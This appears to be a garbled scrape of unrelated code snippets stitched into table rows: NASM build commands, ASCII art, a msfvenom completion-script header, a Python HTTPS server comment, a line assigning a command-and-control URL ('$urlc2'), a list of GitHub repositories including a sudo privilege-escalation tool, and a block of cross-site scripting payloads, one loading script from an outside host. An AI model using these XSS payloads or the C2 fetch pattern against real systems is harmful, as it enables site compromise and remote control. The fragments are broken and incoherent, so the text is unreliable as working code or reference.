how to assemble and link:
nasm -f elf32 -o <filename>.o <filename>.asm
ld -m elf_i386 -o <filename> <filename>.otemplate code (hello world):
section .text
global _start| . | |
| .. | |
| ........ | |
| @ | |
| * | |
| *.* | |
| *.*.* | |
| 🎠|
| #compdef msfvenom | |
| #autoload | |
| # | |
| # zsh completion for msfvenom in Metasploit Framework Project (https://www.metasploit.com) | |
| # | |
| # license: GNU General Public License v3.0 | |
| # | |
| # Copyright (c) 2018, Green-m | |
| # All rights reserved. | |
| # |
| # taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/ | |
| # generate server.xml with the following command: | |
| # openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes | |
| # run as follows: | |
| # python simple-https-server.py | |
| # then in your browser, visit: | |
| # https://localhost:4443 | |
| import BaseHTTPServer, SimpleHTTPServer | |
| import ssl |
| ping 127.0.0.1 | |
| $urlc2="https://rentry.co/piu2/raw" |
| https://github.com/github/training-kit | |
| https://github.com/AdguardTeam/AdGuardHome | |
| https://github.com/TH3xACE/SUDO_KILLER | |
| https://github.com/simbody/simbody | |
| https://github.com/qtc-de/remote-method-guesser |
| ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
| '';!--"<XSS>=&{()} | |
| 0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-" | |
| <script/src=data:,alert()> | |
| <marquee/onstart=alert()> | |
| <video/poster/onerror=alert()> | |
| <isindex/autofocus/onfocus=alert()> | |
| <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> | |
| <IMG SRC="javascript:alert('XSS');"> | |
| <IMG SRC=javascript:alert('XSS')> |